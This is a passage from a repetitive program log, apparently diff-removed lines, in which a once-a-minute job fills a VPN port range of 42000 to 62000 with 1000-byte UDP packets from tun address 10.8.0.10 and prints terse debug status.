46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 07:44:04 -Starting port fill at 2020-09-06 07:45:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 07:45:04 -Starting port fill at 2020-09-06 07:46:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -Finished port fill at 2020-09-06 07:46:06 -Starting port fill at 2020-09-06 07:47:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 07:47:04 -Starting port fill at 2020-09-06 07:48:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 07:48:04 -Starting port fill at 2020-09-06 07:49:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 07:49:06 -Starting port fill at 2020-09-06 07:50:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 07:50:06 -Starting port fill at 2020-09-06 07:51:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 07:51:06 -Starting port fill at 2020-09-06 07:52:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 07:52:05 -Starting port fill at 2020-09-06 07:53:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 07:53:06 -Starting port fill at 2020-09-06 07:54:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 07:54:07 -Starting port fill at 2020-09-06 07:55:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 07:55:06 -Starting port fill at 2020-09-06 07:56:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 07:56:05 -Starting port fill at 2020-09-06 07:57:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 07:57:05 -Starting port fill at 2020-09-06 07:58:02 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 07:58:05 -Starting port fill at 2020-09-06 07:59:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -Finished port fill at 2020-09-06 07:59:06 -Starting port fill at 2020-09-06 08:00:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 08:00:06 -Starting port fill at 2020-09-06 08:01:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -Finished port fill at 2020-09-06 08:01:06 -Starting port fill at 2020-09-06 08:02:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 08:02:05 -Starting port fill at 2020-09-06 08:03:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 08:03:04 -Starting port fill at 2020-09-06 08:04:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 08:04:04 -Starting port fill at 2020-09-06 08:05:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 08:05:04 -Starting port fill at 2020-09-06 08:06:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 08:06:04 -Starting port fill at 2020-09-06 08:07:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 